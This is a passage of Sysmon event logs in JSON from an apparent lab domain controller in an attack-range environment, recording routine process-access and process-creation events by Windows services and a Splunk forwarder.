\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4283,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:56.501\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:56.501","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4284,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:56.501\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:56.501","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4285,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:56.501\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:56.501","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4286,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:56.501\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:56.501","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4287,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:56.501\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:56.501","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4288,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:56.501\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:56.501","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4289,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:56.501\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1148-5F25-0000-0010450F0600}\r\nTargetProcessId: 860\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:56.501","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1148-5F25-0000-0010450F0600}","TargetProcessId":"860","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4290,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:57.174\r\nProcessGuid: {E2A3D6B1-1149-5F25-0000-001049110600}\r\nProcessId: 1172\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:52:57.174","ProcessGuid":"{E2A3D6B1-1149-5F25-0000-001049110600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4291,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:57.173\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1149-5F25-0000-001049110600}\r\nTargetProcessId: 1172\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program 